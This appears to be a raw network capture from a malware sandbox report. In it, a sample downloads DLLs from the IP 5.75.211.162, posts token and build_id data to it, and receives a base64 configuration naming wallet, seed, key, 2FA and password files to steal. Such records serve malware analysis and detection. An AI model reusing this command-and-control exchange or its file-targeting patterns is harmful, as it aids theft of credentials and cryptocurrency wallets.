89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb Data Ascii: 1M1<^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1

Timestamp	Bytes transferred	Direction	Data
2024-09-25 16:00:46 UTC	201	OUT	GET /vcruntime140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-25 16:00:46 UTC	262	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 25 Sep 2024 16:00:46 GMT Content-Type: application/octet-stream Content-Length: 80880 Connection: close Last-Modified: Wednesday, 25-Sep-2024 16:00:46 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-25 16:00:46 UTC	16122	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"
2024-09-25 16:00:46 UTC	16384	IN	Data Raw: 02 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 Data Ascii: +t3MNB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F
2024-09-25 16:00:46 UTC	16384	IN	Data Raw: 00 75 08 8b 45 94 a3 a4 f2 00 10 8d 45 cc 50 e8 39 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 Data Ascii: uEEP9Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMG
2024-09-25 16:00:46 UTC	16384	IN	Data Raw: 8b d0 81 c9 00 08 00 00 83 e2 18 74 1c 83 fa 08 74 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d Data Ascii: ttt@++t+t+u+uQ<0\|*<9&w/c5~bASJCtv
2024-09-25 16:00:46 UTC	15606	IN	Data Raw: 4e 54 cf 8f f8 b4 e9 00 40 03 d5 1c 16 4c d1 c1 d6 ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 Data Ascii: NT@L\|5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicr

Timestamp	Bytes transferred	Direction	Data
2024-09-25 16:00:47 UTC	193	OUT	GET /nss3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-25 16:00:47 UTC	264	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 25 Sep 2024 16:00:47 GMT Content-Type: application/octet-stream Content-Length: 2046288 Connection: close Last-Modified: Wednesday, 25-Sep-2024 16:00:47 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-25 16:00:47 UTC	16120	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
2024-09-25 16:00:47 UTC	16384	IN	Data Raw: ee 1f 01 f2 6b d2 64 89 c7 29 d7 c1 fb 15 01 f3 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 Data Ascii: kd)i)ff f@U \|AAIQQAEq@AfAAi)\f fR \|9U\|&AVQ\|A@fAfAA1<MA
2024-09-25 16:00:47 UTC	16384	IN	Data Raw: 68 52 f4 1b 10 51 e8 3d b8 06 00 83 c4 0c 66 83 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b Data Ascii: hRQ=fti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`\|$\tD$euL$PhD$TD$
2024-09-25 16:00:47 UTC	16384	IN	Data Raw: 77 40 a1 08 11 1e 10 40 a3 08 11 1e 10 3b 05 30 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e Data Ascii: w@@;0w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SL
2024-09-25 16:00:47 UTC	16384	IN	Data Raw: ff ff 8b 44 24 08 8a 40 12 e9 fc fc ff ff 8b 44 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 Data Ascii: D$@D$pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hh
2024-09-25 16:00:47 UTC	16384	IN	Data Raw: 24 18 89 d8 25 ff ff ff 7f 89 44 24 1c 85 f6 7e 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 Data Ascii: $%D$~o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$h
2024-09-25 16:00:47 UTC	16384	IN	Data Raw: 46 64 8b 0c 38 e8 8e f3 ff ff 43 83 c7 30 3b 5e 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 Data Ascii: Fd8C0;^h\|D$Fh\|$urVd@\|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$\|$D$pdD$H<@D>D$1V>D$>D$>D$
2024-09-25 16:00:47 UTC	16384	IN	Data Raw: e9 e7 00 00 00 8b 99 4c 01 00 00 85 db 0f 85 82 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 Data Ascii: LHukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-M
2024-09-25 16:00:47 UTC	16384	IN	Data Raw: 89 59 18 e8 60 50 fe ff 31 c0 39 46 24 0f 84 b8 f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 Data Ascii: Y`P19F$WtL$ u\|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$Rt
2024-09-25 16:00:47 UTC	16384	IN	Data Raw: 00 00 00 85 c0 0f 85 34 f9 ff ff e9 a7 e8 ff ff c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 Data Ascii: 4D$$D$@@L$;A<\|$7h't$D$$hH\|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$

Timestamp	Bytes transferred	Direction	Data
2024-09-25 16:00:50 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JEHIJJKEGHJJKECBKECF User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 1145 Connection: Keep-Alive Cache-Control: no-cache
2024-09-25 16:00:50 UTC	1145	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 45 48 49 4a 4a 4b 45 47 48 4a 4a 4b 45 43 42 4b 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 33 39 66 30 65 30 61 33 61 37 34 39 62 66 62 62 64 35 37 61 33 62 62 32 66 64 62 65 62 33 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 49 4a 4a 4b 45 47 48 4a 4a 4b 45 43 42 4b 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 38 63 64 32 35 30 62 31 35 65 36 36 36 65 35 66 37 32 66 63 66 35 63 61 61 36 63 62 31 33 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 48 49 4a 4a 4b 45 47 48 4a 4a 4b 45 43 42 4b 45 43 46 0d 0a 43 6f 6e 74 Data Ascii: ------JEHIJJKEGHJJKECBKECFContent-Disposition: form-data; name="token"439f0e0a3a749bfbbd57a3bb2fdbeb34------JEHIJJKEGHJJKECBKECFContent-Disposition: form-data; name="build_id"58cd250b15e666e5f72fcf5caa6cb131------JEHIJJKEGHJJKECBKECFCont
2024-09-25 16:00:51 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 25 Sep 2024 16:00:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-25 16:00:51 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Timestamp	Bytes transferred	Direction	Data
2024-09-25 16:00:53 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHJDHJKFIECAAKFIJJKJ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-25 16:00:53 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 33 39 66 30 65 30 61 33 61 37 34 39 62 66 62 62 64 35 37 61 33 62 62 32 66 64 62 65 62 33 34 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 38 63 64 32 35 30 62 31 35 65 36 36 36 65 35 66 37 32 66 63 66 35 63 61 61 36 63 62 31 33 31 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 4a 4b 4a 0d 0a 43 6f 6e 74 Data Ascii: ------EHJDHJKFIECAAKFIJJKJContent-Disposition: form-data; name="token"439f0e0a3a749bfbbd57a3bb2fdbeb34------EHJDHJKFIECAAKFIJJKJContent-Disposition: form-data; name="build_id"58cd250b15e666e5f72fcf5caa6cb131------EHJDHJKFIECAAKFIJJKJCont
2024-09-25 16:00:53 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 25 Sep 2024 16:00:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-25 16:00:53 UTC	1524	IN	Data Raw: 35 65 38 0d 0a 52 6d 78 68 63 32 68 38 4a 55 52 53 53 56 5a 46 58 31 4a 46 54 55 39 57 51 55 4a 4d 52 53 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 Data Ascii: 5e8Rmxhc2h8JURSSVZFX1JFTU9WQUJMRSVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKi